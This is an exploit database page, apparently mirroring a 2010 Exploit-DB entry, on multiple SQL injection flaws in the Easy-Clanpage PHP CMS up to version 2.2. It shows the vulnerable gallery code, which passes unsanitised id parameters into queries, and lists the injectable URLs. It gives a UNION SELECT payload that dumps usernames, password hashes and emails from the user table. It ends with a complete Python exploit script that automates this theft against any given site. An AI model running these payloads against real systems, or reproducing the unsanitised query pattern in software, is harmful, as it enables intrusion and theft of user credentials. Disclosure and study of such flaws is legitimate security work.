header-logo
Suggest Exploit
vendor:
Easy-Clanpage
by:
Easy Laster
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Easy-Clanpage
Affected Version From: 2.1
Affected Version To: 2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:easy-clanpage:easy-clanpage
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2010

Easy-Clanpage <= v2.2 multiple SQL Injection + Exploit

Easy-Clanpage is prone to a multiple SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries by injecting arbitrary SQL code, allowing for the manipulation or disclosure of arbitrary data. This issue affects versions prior to Easy-Clanpage 2.2.

Mitigation:

To mitigate this vulnerability, ensure that user-supplied data is properly sanitized before using it in an SQL query.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Easy-Clanpage <= v2.2 multiple SQL Injection + Exploit 
+Autor : Easy Laster
+Date   : 31.03.2010
+Script  : Easy-Clanpage <= v2.2
+Download : Update Version 2.1->2.2 http://www.easy-clanpage.de
/?section=downloads&action=viewdl&id=18
+Price : for free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101..

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability PHP Code

-#######################################################################################-
IF(isset($_GET['action'])) {
        switch($_GET['action']) {
            case "viewpic":
                gallery_show_pic($_GET['id']);
            break;
            case "gallery":
                gallery_show_gallery($_GET['id']);
            break;
            case "kate":
                gallery_show_kate($_GET['id']);
            break;
            case "comments":
                gallery_show_pic((int)$_GET['id']);
            break;
            case "commentsadd":
                write_comment('gallery', (int)$_GET['id'], ALLOW_ANONYM, SPAM_NEWS_COMMENT , LIMIT_COMMENTS);
            break;
            case "commentsquote":
                write_comment_qoute('gallery', (int)$_GET['id'],(int)$_GET['quote']);
            break;
            case "commentsedit":
                comments_edit('gallery', (int)$_GET['subid'], (int)$_GET['id'], LIMIT_COMMENTS);
            break;
            default:
                gallery();
        }
-#######################################################################################-

+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=viewpic&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=gallery&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=kate&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=comments&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=commentsquote&id=
+Vulnerability : http://www.site.com/easyclanpage/?section=gallery&action=commentsedit&id=

+SQL Injection
+Exploitable   : http://www.site.com/easyclanpage/?section=gallery&action=gallery&id=
-1111111111+union+select+1,2,concat(username,0x3a,password,0x3a,email),4+from+ecp_user
+where+userID=1--+

-----------------------------------------------------------------------------------------

#Exploit
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, re

if len(sys.argv) < 2:
    print "***************************************************************"
    print "*************** Easy-Clanpage v2.2 Gallery Hack ***************"
    print "***************************************************************"
    print "*         Discovered and vulnerability by Easy Laster         *"       
    print "*         Easy-Clanpage <= v2.2 SQL Injection Exploit         *"
    print "*                      coded by Dr.ChAoS                      *"
    print "*                                                             *"
    print "* Usage:                                                      *"
    print "* python exploit.py http://site.de/ecp/ <userid, default=1>   *"
    print "*                                                             *"
    print "***************************************************************"
    exit()

if len(sys.argv) < 3:
    id = 1
else:
    id = sys.argv[2]

site = sys.argv[1]
if site[-1:] != "/":
    site += "/"

url = site + "index.php?section=gallery&action=gallery&id=-1111111111+union+select+1,2,concat(0x23,0x23,0x23,0x23,0x23,username,0x3a,password,0x3a,email,0x23,0x23,0x23,0x23,0x23),4+from+ecp_user+where+userID=" + str(id) + "--"

print "Exploiting..."

html = urllib2.urlopen(url).read()
# I hate regex!
data = re.findall(r"#####(.*)\:([0-9a-fA-F]{32})\:(.*)#####", html)
if len(data) > 0:
    print "Success!\n"
    print "ID: " + str(id)
    print "Username: " + data[0][0]
    print "Password: " + data[0][1]
    print "E-Mail: " + data[0][2]
    print "\nHave a nice day!"
else:
    print "Exploit failed..."

Navigation

Suggest Exploit

Services By CQR